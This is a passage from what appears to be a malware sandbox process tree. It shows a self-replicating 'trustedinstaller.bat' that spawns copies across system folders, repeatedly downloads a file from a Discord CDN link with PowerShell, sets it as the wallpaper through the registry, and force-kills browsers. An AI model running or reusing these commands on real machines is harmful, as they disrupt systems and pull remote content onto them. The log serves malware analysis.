        C:\Windows\system32\cmd.exe /K "C:\PerfLogs\trustedinstaller.bat"
        5⤵
        
        PID:9560
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Windows\trustedinstaller.bat"
        5⤵
        
        PID:9592
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Users\trustedinstaller.bat"
        5⤵
        
        PID:9616
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "chrome.exe"
        5⤵
        
        PID:9648
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Users\trustedinstaller.bat"
      4⤵
      PID:2200
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:5924
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
        5⤵
        
        PID:764
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:4232
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Program Files\BatchFile\trustedinstaller.bat"
        5⤵
        
        PID:9992
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "chrome.exe"
      4⤵
      Kills process with taskkill
      PID:2056
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "firefox.exe"
      4⤵
      PID:1512
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "msedge.exe"
      4⤵
      Kills process with taskkill
      PID:1852
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "chrome.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2472
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "firefox.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3068
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "msedge.exe"
    3⤵
    - Kills process with taskkill
    PID:4172
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "opera.exe"
    3⤵
    - Kills process with taskkill
    PID:3248
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K "C:\Windows\System32\trustedinstaller.bat"
  2⤵
  - Drops file in Program Files directory
  - Drops file in Windows directory
  - Suspicious use of WriteProcessMemory
  PID:2836
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2628
- - C:\Windows\system32\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
    3⤵
    - Sets desktop wallpaper using registry
    PID:1364
- - C:\Windows\system32\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:2464
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Program Files\BatchFile\trustedinstaller.bat"
    3⤵
    - Drops file in System32 directory
    - Drops file in Windows directory
    PID:2856
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2624
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
      4⤵
      Sets desktop wallpaper using registry
      PID:3768
  - - C:\Windows\system32\rundll32.exe
      RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
      4⤵
      PID:1660
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Program Files\BatchFile\trustedinstaller.bat"
      4⤵
      PID:3028
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:3496
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
        5⤵
        
        PID:1524
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Windows\System32\trustedinstaller.bat"
      4⤵
      PID:3448
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        Blocklisted process makes network request
        
        PID:1660
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
        5⤵
        
        PID:3180
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:6928
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\BatchFile\trustedinstaller.bat"
      4⤵
      PID:3428
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:3776
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
        5⤵
        
        PID:6348
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:8792
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\PerfLogs\trustedinstaller.bat"
      4⤵
      PID:3792
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2228
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
        5⤵
        
        PID:6016
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:9888
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Windows\trustedinstaller.bat"
      4⤵
      PID:4048
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:1812
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
        5⤵
        
        PID:2660
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:8372
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Users\trustedinstaller.bat"
      4⤵
      PID:3968
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:3824
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
        5⤵
        
        PID:6424
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:4060
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "chrome.exe"
      4⤵
      PID:3244
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "firefox.exe"
      4⤵
      Kills process with taskkill
      PID:2864
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "msedge.exe"
      4⤵
      PID:1108
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Windows\System32\trustedinstaller.bat"
    3⤵
    - Drops file in Program Files directory
    - Drops file in Windows directory
    PID:2764
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:308
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
      4⤵
      Sets desktop wallpaper using registry
      PID:3668
  - - C:\Windows\system32\rundll32.exe
      RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
      4⤵
      PID:1752
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Program Files\BatchFile\trustedinstaller.bat"
      4⤵
      PID:1308
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:6936
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Windows\System32\trustedinstaller.bat"
      4⤵
      PID:2416
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:888
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
        5⤵
        
        PID:6728
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:8356
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\BatchFile\trustedinstaller.bat"
      4⤵
      PID:2420
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:2400
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
        5⤵
        
        PID:5296
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\PerfLogs\trustedinstaller.bat"
      4⤵
      PID:1688
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:1800
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Windows\trustedinstaller.bat"
      4⤵
      PID:2008
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4672
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
        5⤵
        
        PID:1068
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:9268
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Users\trustedinstaller.bat"
      4⤵
      PID:3344
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1448
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
        5⤵
        
        PID:6744
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "chrome.exe"
      4⤵
      PID:2616
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "firefox.exe"
      4⤵
      Kills process with taskkill
      PID:5056
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\BatchFile\trustedinstaller.bat"
    3⤵
    - Drops file in System32 directory
    - Drops file in Program Files directory
    - Drops file in Windows directory
    PID:2716
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2224
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
      4⤵
      Sets desktop wallpaper using registry
      PID:3756
  - - C:\Windows\system32\rundll32.exe
      RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
      4⤵
      PID:3568
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Program Files\BatchFile\trustedinstaller.bat"
      4⤵
      PID:5412
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:2464
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Windows\System32\trustedinstaller.bat"
      4⤵
      PID:5420
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:1856
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
        5⤵
        
        PID:2448
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:9400
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\BatchFile\trustedinstaller.bat"
      4⤵
      PID:5480
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:3704
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\PerfLogs\trustedinstaller.bat"
      4⤵
      PID:5488
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:3200
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Windows\trustedinstaller.bat"
      4⤵
      PID:4900
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:4536
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Users\trustedinstaller.bat"
      4⤵
      PID:5560
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:4076
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "chrome.exe"
      4⤵
      PID:3592
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "firefox.exe"
      4⤵
      PID:5344
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\PerfLogs\trustedinstaller.bat"
    3⤵
    - Drops file in System32 directory
    - Drops file in Program Files directory
    - Drops file in Windows directory
    PID:2884
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2020
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
      4⤵
      Sets desktop wallpaper using registry
      PID:3704
  - - C:\Windows\system32\rundll32.exe
      RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
      4⤵
      PID:3624
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Program Files\BatchFile\trustedinstaller.bat"
      4⤵
      PID:1332
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:3276
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Windows\System32\trustedinstaller.bat"
      4⤵
      PID:6088
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:3272
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\BatchFile\trustedinstaller.bat"
      4⤵
      PID:6104
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2304
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\PerfLogs\trustedinstaller.bat"
      4⤵
      PID:4316
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3868
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Windows\trustedinstaller.bat"
      4⤵
      PID:4148
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:3756
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Users\trustedinstaller.bat"
      4⤵
      PID:1548
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:624
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "chrome.exe"
      4⤵
      Kills process with taskkill
      PID:5760
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "firefox.exe"
      4⤵
      PID:5180
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Windows\trustedinstaller.bat"
    3⤵
    - Drops file in System32 directory
    - Drops file in Program Files directory
    PID:2348
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2024
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
      4⤵
      Sets desktop wallpaper using registry
      PID:3800
  - - C:\Windows\system32\rundll32.exe
      RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
      4⤵
      PID:3372
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Program Files\BatchFile\trustedinstaller.bat"
      4⤵
      PID:6020
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:5236
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
        5⤵
        
        PID:3232
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:8736
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Windows\System32\trustedinstaller.bat"
      4⤵
      PID:3980
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
